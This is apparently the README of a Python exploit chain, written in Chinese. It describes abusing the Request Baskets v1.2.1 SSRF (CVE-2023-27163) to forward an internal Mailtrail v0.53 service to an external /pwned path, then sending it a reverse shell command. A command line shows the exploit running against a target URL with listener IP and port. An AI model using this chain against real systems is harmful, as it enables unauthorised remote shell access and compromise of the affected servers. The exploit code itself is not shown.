
Python 漏洞利用链,将 Requests Baskets 中的 CVE-2023-27163 SSRF 与 Mailtrail v0.53 结合,以转发内部服务并执行反向 shell。
以下利用程序滥用 Requests Baskets v1.2.1 SSRF 漏洞,将运行在 127.0.0.1:80 的内部应用程序转发到位于 /pwned 的外部应用程序。一旦 Mailtrail v0.53 应用程序被转发,它将对其执行反向 shell 命令,几秒钟内用户应能在目标机器上获得一个反向 shell。
python3 ./exploit http://10.10.10.10:55555 LISTENER-IP LISTENER-PORT